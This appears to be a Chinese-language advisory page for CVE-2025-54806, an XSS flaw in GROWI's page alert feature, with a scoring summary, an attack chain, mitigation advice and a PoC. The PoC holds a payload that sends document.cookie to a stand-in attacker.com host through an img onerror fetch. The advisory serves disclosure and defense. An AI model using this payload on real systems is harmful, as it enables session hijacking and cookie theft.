CVE-2025-54806 GROWI页面警告功能跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-54806

漏洞类型

XSS（跨站脚本）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GROWI

漏洞概述

CVE-2025-54806是GROWI企业维基系统中发现的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于GROWI v4.2.7及更早版本的页面警告（Page Alert）功能中。GROWI是一款开源的企业协作平台，广泛用于团队知识管理、文档协作和内部沟通。攻击者可以通过构造恶意的URL参数，在页面警告功能中注入任意JavaScript代码。当已登录的用户访问包含恶意脚本的URL时，攻击者的脚本将在用户浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于该漏洞利用无需认证，且攻击发生在用户交互过程中，因此具有较高的实际威胁性。建议受影响的用户尽快升级到最新版本，并在修复前避免点击来源不明的链接。

技术细节

该XSS漏洞主要源于GROWI的页面警告功能对用户输入缺乏充分的输入验证和输出编码。攻击者可以在URL参数中嵌入恶意JavaScript代码，当用户访问该URL时，恶意代码会被存储在页面警告功能中，并在后续页面加载时执行。漏洞的CVSS 3.1向量为AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明攻击复杂度低，无需认证，但需要用户交互。攻击路径为网络层面，可影响机密性和完整性。利用此漏洞需要以下条件：1）攻击者知晓目标GROWI实例的URL结构；2）目标用户已登录GROWI；3）目标用户点击或访问包含恶意脚本的链接。由于GROWI常用于企业内网环境，攻击者可能通过钓鱼邮件或内部消息传播恶意链接。漏洞的根本原因是未对用户输入进行HTML实体编码，导致JavaScript代码被浏览器解析执行。

攻击链分析

STEP 1

步骤1

攻击者收集目标GROWI实例信息，包括版本号和URL结构

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的URL，针对页面警告功能的参数进行注入

STEP 3

步骤3

攻击者通过钓鱼邮件、即时消息或其他社交工程手段，将恶意URL发送给已登录的GROWI用户

STEP 4

步骤4

目标用户点击恶意URL，浏览器发送请求到GROWI服务器

STEP 5

步骤5

GROWI服务器未对输入进行充分验证和编码，将恶意脚本存储或反射到响应页面

STEP 6

步骤6

用户浏览器解析HTML响应时，执行注入的恶意JavaScript代码

STEP 7

步骤7

恶意脚本窃取用户会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-54806 PoC - XSS in GROWI Page Alert Function -->
<!-- This PoC demonstrates the XSS vulnerability in GROWI's page alert function -->
<!-- Target: GROWI versions <= v4.2.7 -->

<!-- Malicious URL to trigger XSS -->
<!-- Replace [GROWI_HOST] with the target GROWI instance URL -->
<script>
// Malicious JavaScript payload
const maliciousPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">" />';

// Construct the malicious URL targeting the page alert function
const growiHost = '[GROWI_HOST]';
const maliciousUrl = `${growiHost}/_api/v3/pages/alert?alertHtml=${encodeURIComponent(maliciousPayload)}`;

// In real attack scenario, this URL would be sent to logged-in users
console.log('Malicious URL:', maliciousUrl);

// Simulate the attack by injecting the payload
// This would be executed when the user visits the crafted URL
document.addEventListener('DOMContentLoaded', function() {
    // Example of how the payload executes
    console.log('XSS Payload would execute:', maliciousPayload);
    // Potential impact: Cookie theft, session hijacking, data exfiltration
});
</script>

<!-- Example attack URL format -->
<!-- https://target-growi.com/_api/v3/pages/alert?alertHtml=<img src=x onerror=alert(document.cookie)> -->

影响范围

GROWI v4.2.7及更早版本

防御指南

临时缓解措施

立即将GROWI升级到v4.2.8或最新稳定版本。在无法立即升级的情况下，可以采取以下临时缓解措施：1）禁用或限制页面警告功能的使用；2）加强对用户输入的过滤和验证；3）启用浏览器的XSS防护机制；4）提醒用户不要点击来源不明的链接；5）监控日志中的可疑请求特征。建议管理员审查用户权限，限制非必要用户访问页面警告功能，并定期检查是否存在已注入的恶意代码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-54806
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-54806
3 Details https://www.cvedetails.com/cve/CVE-2025-54806/
4 VulDB https://vuldb.com/cve/CVE-2025-54806
5 Link https://growi.co.jp/news/38/
6 Link https://jvn.jp/en/jp/JVN46526244/